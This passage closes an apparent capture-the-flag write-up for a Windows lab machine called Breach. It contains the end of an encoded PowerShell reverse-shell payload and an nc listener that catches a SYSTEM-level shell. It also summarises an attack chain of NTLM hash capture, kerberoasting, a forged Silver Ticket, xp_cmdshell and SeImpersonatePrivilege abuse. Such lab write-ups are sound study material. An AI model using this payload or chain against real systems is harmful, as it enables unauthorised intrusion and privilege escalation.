gBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
Then you can get the shell as nt authority\system
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.17.50] from (UNKNOWN) [10.129.249.166] 57081
whoami
nt authority\system
Description
Breach (medium, Windows): guest SMB write access is used to capture NTLMv2 hashes and obtain a low-privileged domain account. A kerberoastable svc_mssql service account is discovered and cracked; with it a Silver Ticket is forged to impersonate Administrator and access MS-SQL. xp_cmdshell yields remote code execution as svc_mssql, and final escalation abuses SeImpersonatePrivilege.